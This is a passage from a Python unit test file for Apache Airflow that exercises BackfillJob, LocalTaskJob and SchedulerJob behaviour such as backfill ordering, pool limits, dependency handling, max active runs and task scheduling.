scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id=='example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
"""
# some DAGs really are just examples... but try to make them work!
skip_dags = [
'example_http_operator',
'example_twitter_dag',
'example_trigger_target_dag',
'example_trigger_controller_dag', # tested above
'test_utils', # sleeps forever
'example_kubernetes_operator', # only works with k8s cluster
]
logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
Test for https://github.com/airbnb/airflow/pull/1225
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule
# test for failed
ti.set_state(State.NONE, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
